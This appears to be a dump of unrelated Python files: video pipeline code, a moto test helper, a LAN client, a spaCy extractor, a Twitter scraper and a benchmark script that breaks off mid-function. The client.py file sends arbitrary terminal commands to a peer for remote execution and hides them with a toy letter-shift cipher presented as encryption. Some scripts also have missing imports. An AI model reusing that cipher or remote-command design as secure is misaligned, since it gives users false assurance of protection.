scale = min(inference_size[0] / src_size[0], inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
|
aiomoto_services.py
|
# Copyright 2019-2022 Darren Weber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import threading
import time
import aiohttp
from pytest_aiomoto.moto_services import CONNECT_TIMEOUT
from pytest_aiomoto.moto_services import MotoService
class AioMotoService(MotoService):
"""Will Create AioMotoService.
Service is ref-counted so there will only be one per process. Real Service will
be returned by `__aenter__`."""
def __call__(self, func):
# override on this prevents any use of this class as a synchronous server
async def wrapper(*args, **kwargs):
await self._aio_start()
try:
result = await func(*args, **kwargs)
finally:
await self._aio_stop()
return result
functools.update_wrapper(wrapper, func)
wrapper.__wrapped__ = func
return wrapper
async def __aenter__(self):
svc = self._services.get(self._service_name)
if svc is None:
self._services[self._service_name] = self
self._refcount = 1
await self._aio_start()
return self
else:
svc._refcount += 1
return svc
async def __aexit__(self, exc_type, exc_val, exc_tb):
self._refcount -= 1
if self._socket:
self._socket.close()
self._socket = None
if self._refcount == 0:
del self._services[self._service_name]
await self._aio_stop()
async def _aio_start(self):
self._thread = threading.Thread(target=self._server_entry, daemon=True)
self._thread.start()
async with aiohttp.ClientSession() as session:
start = time.time()
while time.time() - start < 10:
if not self._thread.is_alive():
break
try:
# we need to bypass the proxies due to monkeypatches
async with session.get(
self.endpoint_url + "/static", timeout=CONNECT_TIMEOUT
):
pass
break
except (asyncio.TimeoutError, aiohttp.ClientConnectionError):
await asyncio.sleep(0.2)
else:
await self._aio_stop() # pytest.fail doesn't call stop_process
raise Exception(
"Cannot start AioMotoService: {}".format(self._service_name)
)
async def _aio_stop(self):
if self._server:
self._server.shutdown()
self._thread.join()
|
client.py
|
#!/usr/bin/env python3
import socket
import re
import threading
import time
import select
import subprocess
from _thread import *
def encrypt(text,s):
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
# Encrypt uppercase characters
if (char.isupper()):
result += chr((ord(char) + s-65) % 26 + 65)
# Encrypt lowercase characters
elif(char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif(char == '\n'):
result += chr(1500)
elif(char == '.'):
result += chr(2000)
elif(char == '-'):
result += chr(2001)
elif(char == '/'):
result += chr(2002)
else:
result += chr(3000)
return result
def decrypt(text,s):
s= 26-s
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
# Encrypt uppercase characters
if (char.isupper()):
result += chr((ord(char) + s-65) % 26 + 65)
# Encrypt lowercase characters
elif(char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif(char == chr(1500)):
result += "\n"
elif(char == chr(2000)):
result += "."
elif(char == chr(2001)):
result += "-"
elif(char == chr(2002)):
result += "/"
else:
result += " "
return result
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#### -----------IP & PORT -------------####
signal_strength = 0
#last_signal_strength = 0
PORT = 12345
Local_IP = get_ip()
search_NET = re.search(r'\b(?:[0-9]{1,3}\.){2}[0-9]{1,3}\b' , Local_IP)
Local_NET = search_NET.group()
buffer_size = 1024
#### -------------------------------- ####
old_packet = ""
start_time = 0
name = input("Enter your name : ")
Online_Users = []
def send_packet(HOST , packet):
global PORT,Online_Users
packet = packet.encode('utf-8' , 'replace')
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((HOST , PORT))
s.sendall(packet)
except:
print("Server is not online any more")
for user in Online_Users:
if user[1] == HOST :
Online_Users.remove(user)
def listen_TCP_packets():
global PORT
global Local_IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((Local_IP , PORT))
s.listen()
while True:
conn , addr = s.accept()
data = conn.recv(buffer_size)
if not data :
break
string = str(data.decode('utf-8' , 'replace'))
receive(string)
conn.close()
def listen_broadcast():
global PORT
global buffer_size
global Local_IP
global old_packet
global start_time
global Online_Users
with socket.socket(socket.AF_INET , socket.SOCK_DGRAM) as s:
s.bind(('', PORT ))
s.setblocking(0)
while True:
result = select.select([s], [], [])
if not result:
break
message = result[0][0].recv(buffer_size)
if not message:
break
string = str(message.decode('utf-8' , 'replace'))
end_time= time.time()
elapsed_time = end_time - start_time
elapsed_time = float(format(elapsed_time , 'f'))
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = string.split(",")[2].strip()
if Local_IP != IP and (old_packet != string or elapsed_time > 5) :
#if (old_packet != string or elapsed_time > 5) :
if [username , IP] not in Online_Users:
Online_Users.append([username , IP])
packet = "[" + name + ", " + Local_IP + ", " + "response" + "]"
#packet_type = announce , response back with unicast TCP
start_new_thread(send_packet,(IP , packet))
old_packet = string
start_time = end_time
def receive(string):
global signal_strength
global Online_Users
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = ""
message = ""
if "message" in string :
packet_type = string.split(",")[2].strip()
message = string.split(",")[3].strip()
message = decrypt(message,signal_strength)
#rssi = string.split(",")[4].strip()
#print("rssi: " + rssi)
print("\n")
print("#####################")
print("\n")
print("Output of command is :")
#print("\n")
print(message)
print("#####################")
print("\n")
print("Please continue to write your instruction or command below")
print("\n")
#response packet
else:
packet_type = string.split(",")[2].strip()
if [username , IP] not in Online_Users:
Online_Users.append([username , IP])
def broadcast(sock,packet):
global PORT
sock.sendto(packet,( '<broadcast>', PORT))
def announce():
global PORT
global Local_IP
global name
packet = "[" + name + ", " + Local_IP + ", " + "announce" + "]"
packet = packet.encode('utf-8' , 'replace')
while True :
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
count = 0
# Send 3 broadcast packets
while count<3 :
start_new_thread(broadcast,(sock,packet))
#sock.sendto(packet , ( '<broadcast>', PORT))
#sleep 0.25 seconds between packets
count = count +1
time.sleep(0.25)
sock.close()
time.sleep(10)
def sendmessage():
global signal_strength
global Online_Users
global Local_IP
global name
#printOnlineUsers()
#ip = input("Enter IP of user : ")
message = input("Enter your terminal command : ")
p = subprocess.Popen("iwconfig", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
cmd, err = p.communicate()
cmd = cmd.decode("utf-8")
index = cmd.find("Signal level")
signal_strength = int(cmd[index+13:index+16])
#last_signal_strength = signal_strength
message = encrypt(message,signal_strength)
checker = None
for user in Online_Users:
if(user[0]=="Server"):
ip=user[1]
packet = "[" + name + ", " + Local_IP + ", " + "message" + ", " + message + ", " + str(signal_strength) + "]"
start_new_thread(send_packet,(ip , packet))
checker = True
break
if(checker== None):
print("####################")
print("Server is not online")
print("####################")
def myProfile():
global PORT
global Local_IP
global Local_NET
global name
print("#####################")
print("MY PROFİLE : ")
print("Username : " + name)
print("Local IP : " + Local_IP)
print("Local NET : "+ Local_NET)
print("PORT : " + str(PORT))
print("#####################")
def quit_app():
subprocess.call(["pkill", "-f" , "client.py"])
def commands():
print("#####################")
print("AVAILABLE COMMANDS")
print("#####################")
commands = ["1)Show my profile" , "2)Send a terminal command" , "3)Quit"]
for command in commands :
print(command)
#print("In order to List online users , type 0")
print("In order to Show my profile , type 1")
print("In order to Send a terminal command , type 2")
print("In order to Quit , type 3")
command = input("Enter your command : ")
if command == "1" :
myProfile()
elif command == "2" :
sendmessage()
elif command == "3":
quit_app()
else :
print("Invalid command")
announce_thread = threading.Thread(target = announce , args=())
announce_thread.setDaemon(True)
announce_thread.start()
listen_thread = threading.Thread(target= listen_broadcast , args=())
listen_thread.setDaemon(True)
listen_thread.start()
listen_packets_thread = threading.Thread(target= listen_TCP_packets , args=())
listen_packets_thread.setDaemon(True)
listen_packets_thread.start()
while True:
commands()
time.sleep(0.5)
|
extract_spacy_np.py
|
"""
Program to extract noun phrases for the given text dataset using Spacy module
Lang: py3
"""
import sys
import csv
import time
import datetime
import spacy
import queue
from threading import Thread
nlp = spacy.load("en")
#The directory where the output file is stored
OUTPUT_DIR = os.path.join(os.getcwd(), 'output')
#Number of threads processing the data on the queue
NUM_THREADS = 20
lst = []
def get_noun_phrases(q):
checkCounts = 0
while True:
#Incase the queue size is 0, the thread will sleep for 5 * 0.5s (2.5s in total) after which they will quit
if(q.qsize() == 0):
if(checkCounts == 5):
break
checkCounts += 1
time.sleep(0.5)
continue
checkCounts = 0
index, tweet_id, text = q.get()
np_text = ""
#Extract the noun phrase using spacy
doc = nlp(text)
#All the noun phrases of given text are separated by "$$$"
for np in doc.noun_chunks:
np_text += np.text + "$$$"
#Add the extracted noun phrases to the list
global lst
lst.append([tweet_id, text, np_text])
#Print the status for every 5000 processed tweets
if(index > 0 and index % 5000 == 0):
print("Extracted noun phrases for", index, "tweets...")
q.task_done()
#Function to write the extracted noun phrases to file
def writeToFile(writer):
global lst
for elem in lst:
writer.writerow(elem)
lst = []
if(__name__ == "__main__"):
if(not(len(sys.argv) == 3)):
print("Usage: extract_spacy_np.py <INPUT_FILEPATH> <COLUMN_NUMBER_CONTAINING_TEXT>")
sys.exit()
if(not(sys.argv[2].isdigit())):
print("ERROR: The column number must be a digit.")
sys.exit()
#Input filepath
input_filepath = sys.argv[1]
#Column number of the text
col_num_text = int(sys.argv[2])
#If the input file is X/Y/input_file.csv, then output filename is input_file_spacyNP.csv
output_filepath = OUTPUT_DIR + input_filepath.split("/")[-1].split(".")[0] + "_spacyNP.csv"
#Initialize the queue
q = queue.Queue()
for i in range(NUM_THREADS):
#Create NUM_THREADS thread workers
worker = Thread(target=get_noun_phrases, args=(q,))
#worker.setDaemon(True)
worker.start()
start = datetime.datetime.now()
with open(input_filepath, "rt") as csvfile:
datareader = csv.reader(csvfile)
next(datareader)
count = 0
for row in datareader:
q.put((count, row[0], row[col_num_text - 1]))
count += 1
print("All items to be processed are in queue...")
q.join()
#Write the extracted noun phrases to a csv
with open(output_filepath, "w") as g:
#Initialize CSV writer object
writer = csv.writer(g, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
#Write the CSV column names
writer.writerow(["tweet_id", "preprocessed_text", "spacy_np"])
#Write all the noun_phrases to a file
writeToFile(writer)
print("Output file created in the output directory!")
print("Time taken to extract noun phrases for the given dataset:", datetime.datetime.now() - start)
|
httpexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import http.client
CURDIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, CURDIR)
import uexpect
from threading import Thread, Event
from queue import Queue, Empty
class IO(uexpect.IO):
def __init__(self, connection, response, queue, reader):
self.connection = connection
self.response = response
super(IO, self).__init__(None, None, queue, reader)
def write(self, data):
raise NotImplementedError
def close(self, force=True):
self.reader["kill_event"].set()
self.connection.close()
if self._logger:
self._logger.write("\n")
self._logger.flush()
def reader(response, queue, kill_event):
while True:
try:
if kill_event.is_set():
break
data = response.read(1).decode()
queue.put(data)
except Exception as e:
if kill_event.is_set():
break
raise
def spawn(connection, request):
connection = http.client.HTTPConnection(**connection)
connection.request(**request)
response = connection.getresponse()
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(response, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(
connection,
response,
queue,
reader={"thread": thread, "kill_event": reader_kill_event},
)
if __name__ == "__main__":
with spawn(
{"host": "localhost", "port": 8123},
{"method": "GET", "url": "?query=SELECT%201"},
) as client:
client.logger(sys.stdout)
client.timeout(2)
print(client.response.status, client.response.reason)
client.expect("1\n")
|
twscraper.py
|
# coding=utf-8
import sys
import unicodecsv as csv
import networkx as nx
import tweepy
import ConfigParser, os
import dal
import threading
from datetime import datetime, timedelta
def daterange(start_date, end_date, interval):
for n in range(int ((end_date - start_date).days/interval)+1):
yield start_date + timedelta(n*interval)
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
if sys.version_info[0] < 3:
import got
else:
import got3 as got
def main():
logger = logging.getLogger('main')
logger.info('Starting Process')
logger.info('Reading ini file')
config = ConfigParser.RawConfigParser()
config.read('config.ini')
consumer_key = config.get('twitter credentials','consumer_key')
consumer_secret = config.get('twitter credentials','consumer_secret')
access_token = config.get('twitter credentials','access_token')
access_token_secret = config.get('twitter credentials','access_token_secret')
savetocsv = config.getboolean('CSV','enabled')
logger.info('Authenticating')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
user = api.get_user('eeftychiou')
logger.info("Connected to Twitter Api: %s",user._api.last_response.status_code)
logger.info("Connecting to Database")
dbacc = dal.TweetDal()
# start consumer and continue scrapping
logger.info("Starting Worker")
TW_thread = threading.Thread(target=TWconsumer)
TW_thread.start()
#TODO load criteria from ini file
searchTerms = 'refugee OR réfugié OR rifugiato OR flüchtling OR flykting OR ' \
'mülteci OR menekült OR refugees OR refugeeswelcome OR refugeecrisis OR ' \
'refugeesGR OR refugeeconvoy'
searchTerms = 'refugee'
dateFrom = "2015-08-29"
dateToo = "2015-09-01"
interval = 5 #days to sample each search
maxTweetPerInterval = 250
dtFrom = datetime.strptime(dateFrom,'%Y-%m-%d')
dtToo = datetime.strptime(dateToo,'%Y-%m-%d')
#setup csv writter
if savetocsv:
csv.register_dialect('myDialect', delimiter=';', quoting=csv.QUOTE_ALL)
fname = dateFrom + "_" + dateToo + "_dump.csv"
outputFile =open(fname, "w+")
myFields = ['username' ,'date','retweets' , 'favorites','replies','text','geo','mentions','hashtags','id','permalink','conversationId','userid']
writer = csv.DictWriter(outputFile, fieldnames=myFields, dialect='myDialect')
writer.writeheader()
logger.info('*** Criteria *** ')
logger.info('searchTerms[%s]',searchTerms)
logger.info('dateFrom[%s] to:[%s] interval[%i] maxTweetPerInterval[%i]', dateFrom,dateToo, interval,maxTweetPerInterval)
for dtItfr in daterange(dtFrom,dtToo, interval):
dtItfrStr = dtItfr.strftime("%Y-%m-%d")
dtItToo = dtItfr + timedelta(interval)
dtIttooStr = dtItToo.strftime("%Y-%m-%d")
logger.info ('Starting export for from: %s to: %s ', dtItfrStr, dtIttooStr )
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(searchTerms).setSince(dtItfrStr).setUntil(
dtIttooStr).setMaxTweets(maxTweetPerInterval)
tweets = got.manager.TweetManager.getTweets(tweetCriteria)
if savetocsv:
for t in tweets:
writer.writerow(t.data)
logger.info(' Rows %d saved to file...\n' % len(tweets))
tweetIDs = [x.data['id'] for x in tweets if not dbacc.tweetExists(x.data['id'])]
dbacc.add_jobs('tweet',tweetIDs)
logger.info('Finished Processing')
# TODO move into own package
def TWconsumer():
import logging
import logging.config
import itertools
import time
logging.config.fileConfig('logConfig.cfg')
TWlogger = logging.getLogger('TW')
TWlogger.info('Reading ini file')
config = ConfigParser.RawConfigParser()
config.read('config.ini')
consumer_key = config.get('twitter credentials','consumer_key')
consumer_secret = config.get('twitter credentials','consumer_secret')
access_token = config.get('twitter credentials','access_token')
access_token_secret = config.get('twitter credentials','access_token_secret')
TWlogger.info('Authenticating')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
user = api.get_user('eeftychiou')
TWlogger.info("Connected to Twitter Api: %s",user._api.last_response.status_code)
TWlogger.info("Connecting to Database")
TWdbacc = dal.TweetDal()
Done = False
opList = ['tweet', 'user', 'wait' ,'done']
g = itertools.cycle(opList)
while not Done:
toggle = next(g)
ids = TWdbacc.get_jobs(toggle, 100)
if len(ids) == 0:
time.sleep(5)
continue
if toggle=='tweet':
ids = api.statuses_lookup(ids, include_entities=True)
for id in ids:
TWdbacc.add_tweet(id)
elif toggle=='user':
for userid in ids:
TWlogger.info("User %s" ,userid)
try:
if not TWdbacc.userExists(userid):
user = api.get_user(user_id =userid)
TWdbacc.add_user(user)
except tweepy.TweepError, e:
print e
if __name__ == '__main__':
import logging
import logging.config
logging.config.fileConfig('logConfig.cfg')
main()
|
acl_decompressor.py
|
import multiprocessing
import os
import platform
import psutil
import queue
import threading
import time
import re
import signal
import subprocess
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = os.path.join(os.getcwd(), '../../test_data/decomp_data_v5')
options['stats'] = ""
options['csv'] = False
options['refresh'] = False
options['num_threads'] = 1
options['android'] = False
options['ios'] = False
options['print_help'] = False
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
options['stats'] = os.path.expanduser(options['stats'])
if value == '-csv':
options['csv'] = True
if value == '-refresh':
options['refresh'] = True
if value == '-android':
options['android'] = True
if value == '-ios':
options['ios'] = True
#if value.startswith('-parallel='):
# options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
if value == '-help':
options['print_help'] = True
if options['print_help']:
print_help()
sys.exit(1)
if options['stats'] == None or len(options['stats']) == 0:
print('-stats output directory is missing')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
def print_usage():
print('Usage: python acl_decompressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv] [-refresh] [-parallel={Num Threads}] [-help]')
def print_help():
print('Usage: python acl_decompressor.py [arguments]')
print()
print('Arguments:')
print(' At least one argument must be provided.')
print(' -acl=<path>: Input directory tree containing clips to compress.')
print(' -stats=<path>: Output directory tree for the stats to output.')
print(' -csv: Generates a basic summary CSV file with various clip information and statistics.')
print(' -refresh: If an output stat file already exists for a particular clip, it is recompressed anyway instead of being skipped.')
print(' -android: Pulls the files from the android device')
print(' -ios: Only computes the stats')
#print(' -parallel=<Num Threads>: Allows multiple clips to be compressed and processed in parallel.')
print(' -help: Prints this help message.')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def get_decomp_categories():
categories = []
categories.append(('forward_pose_cold', 'forward', 'pose', 'cold'))
categories.append(('backward_pose_cold', 'backward', 'pose', 'cold'))
categories.append(('random_pose_cold', 'random', 'pose', 'cold'))
categories.append(('forward_pose_warm', 'forward', 'pose', 'warm'))
categories.append(('backward_pose_warm', 'backward', 'pose', 'warm'))
categories.append(('random_pose_warm', 'random', 'pose', 'warm'))
categories.append(('forward_bone_cold', 'forward', 'bone', 'cold'))
categories.append(('backward_bone_cold', 'backward', 'bone', 'cold'))
categories.append(('random_bone_cold', 'random', 'bone', 'cold'))
categories.append(('forward_bone_warm', 'forward', 'bone', 'warm'))
categories.append(('backward_bone_warm', 'backward', 'bone', 'warm'))
categories.append(('random_bone_warm', 'random', 'bone', 'warm'))
return categories
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv']:
decomp_categories = get_decomp_categories()
for category in decomp_categories:
stats_decompression_csv_filename = os.path.join(stat_dir, 'stats_decompression_{}_{}_{}.csv'.format(category[2], category[3], category[1]))
stats_decompression_csv_file = open(stats_decompression_csv_filename, 'w')
csv_data[category[0]] = stats_decompression_csv_file
print('Generating CSV file {} ...'.format(stats_decompression_csv_filename))
print('Clip Name, Min, Max, Avg', file = stats_decompression_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
for csv_file in csv_data.values():
csv_file.close()
def append_csv(csv_data, job_data):
decomp_categories = get_decomp_categories()
data = job_data['stats_summary_data']
for (clip_name, perf_stats) in data:
#perf_stats[key] = (category, decomp_min, decomp_max, decomp_avg)
for key, stats in perf_stats.items():
if key in csv_data:
csv_file = csv_data[key]
(category, decomp_min, decomp_max, decomp_avg) = stats
print('{}, {}, {}, {}'.format(clip_name, decomp_min, decomp_max, decomp_avg), file = csv_file)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def run_acl_decompressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
os.system(cmd)
result_queue.put(acl_filename)
def decompress_clips_android(options):
acl_dir = options['acl']
stat_dir = options['stats']
stat_files = []
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson') and not filename.endswith('.acl.bin'):
continue
acl_filename = os.path.join(dirpath, filename)
if filename.endswith('.acl.sjson'):
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
else:
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.bin', '_stats.sjson'))
stat_files.append(stat_filename)
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
if len(stat_files) == 0:
print('No ACL clips found to decompress')
sys.exit(0)
output = str(subprocess.check_output('adb logcat -s acl -e "Stats will be written to:" -m 1 -d'))
matches = re.search('Stats will be written to: ([/\.\w]+)', output)
if matches == None:
print('Failed to find Android source directory from ADB')
print('/storage/emulated/0/Android/data/com.acl/files will be used instead')
android_src_dir = '/storage/emulated/0/Android/data/com.acl/files'
else:
android_src_dir = matches.group(1)
curr_dir = os.getcwd()
os.chdir(stat_dir)
for stat_filename in stat_files:
dst_filename = os.path.basename(stat_filename)
src_filename = os.path.join(android_src_dir, dst_filename).replace('\\', '/')
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
os.chdir(curr_dir)
return stat_files
def decompress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
refresh = options['refresh']
if platform.system() == 'Windows':
decompressor_exe_path = '../../build/bin/acl_decompressor.exe'
else:
decompressor_exe_path = '../../build/bin/acl_decompressor'
decompressor_exe_path = os.path.abspath(decompressor_exe_path)
if not os.path.exists(decompressor_exe_path) and not options['ios']:
print('Decompressor exe not found: {}'.format(decompressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson') and not filename.endswith('.acl.bin'):
continue
acl_filename = os.path.join(dirpath, filename)
if filename.endswith('.acl.sjson'):
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
else:
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.bin', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if options['ios']:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
cmd = '{} -acl="{}" -stats="{}" -decomp'.format(decompressor_exe_path, acl_filename, stat_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to decompress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
decompression_start_time = time.perf_counter()
threads = [ threading.Thread(target = run_acl_decompressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(stat_files), 'Decompressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
print_progress(num_processed, len(stat_files), 'Decompressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
if thread.isAlive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
decompression_end_time = time.perf_counter()
print()
print('Compressed {} clips in {}'.format(len(stat_files), format_elapsed_time(decompression_end_time - decompression_start_time)))
return stat_files
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
num_runs = 0
stats_summary_data = []
decomp_categories = get_decomp_categories()
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
try:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
run_stats['filename'] = stat_filename
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
num_runs += 1
perf_stats = {}
if 'decompression_time_per_sample' in run_stats:
for category in decomp_categories:
key = category[0]
if key in run_stats['decompression_time_per_sample']:
decomp_data = run_stats['decompression_time_per_sample'][key]
decomp_min = decomp_data['min_time_ms']
decomp_max = decomp_data['max_time_ms']
decomp_avg = decomp_data['avg_time_ms']
perf_stats[key] = (category, decomp_min, decomp_max, decomp_avg)
if options['csv']:
#(name, perf_stats)
data = (run_stats['clip_name'], perf_stats)
stats_summary_data.append(data)
result_queue.put(('progress', stat_filename))
except sjson.ParseException:
print('Failed to parse SJSON file: {}'.format(stat_filename))
# Done
results = {}
results['num_runs'] = num_runs
results['stats_summary_data'] = stats_summary_data
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
def set_process_affinity(affinity):
if platform.system() == 'Windows':
p = psutil.Process()
p.cpu_affinity([affinity])
if __name__ == "__main__":
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run this script')
sys.exit(1)
options = parse_argv()
# Set the affinity to core 0, on platforms that support it, core 2 will be used to decompress
set_process_affinity(0)
if options['android']:
stat_files = decompress_clips_android(options)
else:
stat_files = decompress_clips(options)
csv_data = create_csv(options)
aggregating_start_time = time.perf_counter()
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
